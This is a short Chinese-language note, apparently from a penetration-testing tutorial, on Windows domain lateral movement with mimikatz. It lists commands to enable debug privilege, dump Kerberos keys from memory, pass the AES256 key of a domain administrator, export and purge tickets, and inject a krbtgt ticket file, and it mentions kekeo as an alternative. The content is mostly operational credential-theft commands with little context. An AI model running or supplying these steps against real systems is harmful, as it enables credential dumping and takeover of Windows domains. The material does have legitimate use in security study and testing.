（1）管理员运行
（2）必须输入
privilege::debug

使用 mimikatz 抓取密钥
sekurlsa::ekeys

获取到 aes-25 后
sekurlsa::pth /user:administrator /domain:yxy.youthbelief.com
/aes256:“aes256 的值”
需要目标机器上安装 KB2871997 补丁 安装了 该补丁后 ，就可以通过 AES256 密
钥 进行哈希传递啦。
票据传递
privilege::debug
sekurlsa::tickets /export
执行该命令后 会在当前目录生成多个服务的票据文件 例如 kirbi 等

使用以下命令 清楚 内存中的票据
kerberos::purge
将票据文件注入内存
kerberos::ptt “[0;4beae]-2-0-40e00000-Administrator@krbtgt-
YXY.YOUTHBELIEF.COM.kirbi”
“文件名”
在当前终端 退出 mimikatz 然后就可以列出目标目录啦。
除了 mimikatz 工具 还可以用 kekeo 传递票据。